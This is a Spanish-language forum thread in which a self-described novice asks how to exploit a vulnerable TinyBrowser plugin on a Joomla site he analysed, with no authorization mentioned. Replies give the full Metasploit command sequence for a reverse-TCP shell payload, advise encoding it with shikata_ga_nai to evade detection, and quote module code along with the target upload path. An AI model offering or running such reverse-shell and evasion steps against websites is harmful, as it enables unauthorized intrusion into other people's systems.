[SOLUCIONADO] Ayuda con exploit para Joomla

BCKTR1X · Julio 18, 2013, 04:47:04 AM

Hola a todos

he analizado una pagina en joomla y me dice que este plugin TinyMCE TinyBrowser (creo que es plugin xD ) es vulnerable entonces voy a metasploit y hay un exploit para ese pero al lanzarlo me da este error "[-] Error retrieving obfuscation code!"

no se a que se refiere asi que si alguien sabe que me ayude un poco

blackdrake · Julio 18, 2013, 07:03:36 AM

Mmmm podrías decirme el nombre del exploit? es este?

Código: php


msf > use exploit/unix/webapp/joomla_tinybrowser
msf exploit(joomla_tinybrowser) > show payloads
msf exploit(joomla_tinybrowser) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(joomla_tinybrowser) > set LHOST MIIP
msf exploit(joomla_tinybrowser) > set RHOST OBJETIVO
msf exploit(joomla_tinybrowser) > exploit

Pones todos los datos correctamente?

Puedes ver el código desde aquí y así ves donde te salta el error: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Un saludo.

Snifer · Julio 18, 2013, 10:19:45 AM

Lo que tienes que hacer es ofuscar el codigo, de tu payload ya que eso es lo que necesitas.

Regards,
Snifer

BCKTR1X · Julio 18, 2013, 09:54:33 PM

Este es "exploit/unix/webapp/joomla_tinybrowser" y como puedo ofuscar el codigo??

soy muy novato

Snifer · Julio 19, 2013, 02:35:04 PM

Te dije el payload -_-! que ofusques revisa sobre MSFVENOM MSFENCODE

Encoding: x86/shikata_ga_nai este es el mas usado

Regards,
Snifer

BCKTR1X · Julio 19, 2013, 04:15:42 PM

jajaja ok

gracias por responder

Psymera · Julio 19, 2013, 08:49:58 PM

No de echo el error lo que marca es que la ofuscacion de codigo fallo asi que tienes que desactivarla xD, eso es comun por que no funciona con php xD
asi que es un error del metasploit solo quita esa opcion y mandalo directo y jala tambien el tiny se puede hacer explotacion a mano :p no es nada dificil

BCKTR1X · Julio 19, 2013, 11:30:45 PM

Me puedes pasar el exploit o explicarme como hacerlo a mano

Psymera · Julio 20, 2013, 04:23:53 AM

Bien nadie le dio una leida al codigo, lo que sale aqui es que esta parchado

Código: php

        if (res)
             
            if(res.body =~ /"obfus", "((\w)+)"\)/)
                obfuscation_code = $1
                print_status("Successfully retrieved obfuscation code: #{obfuscation_code}")
            else
                print_error("Error retrieving obfuscation code!")
                return
            end
        end

por eso te sale del codigo de ofuscacion y muere es un codigo que se ocupa para que sea valida la peticion si entras manualmente al lugar te va a mandar al cuerno en pocas palabras esta parchado http://target/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder=

[SOLUCIONADO] Ayuda con exploit para Joomla

BCKTR1X

Julio 18, 2013, 04:47:04 AM Ultima modificación: Agosto 30, 2014, 09:16:54 AM por Expermicid

blackdrake

Julio 18, 2013, 07:03:36 AM #1

Snifer

Julio 18, 2013, 10:19:45 AM #2

BCKTR1X

Julio 18, 2013, 09:54:33 PM #3

Snifer

Julio 19, 2013, 02:35:04 PM #4

BCKTR1X

Julio 19, 2013, 04:15:42 PM #5

Psymera

Julio 19, 2013, 08:49:58 PM #6 Ultima modificación: Julio 20, 2013, 10:27:56 AM por Snifer

BCKTR1X

Julio 19, 2013, 11:30:45 PM #7

Psymera

Julio 20, 2013, 04:23:53 AM #8 Ultima modificación: Julio 20, 2013, 10:28:32 AM por Snifer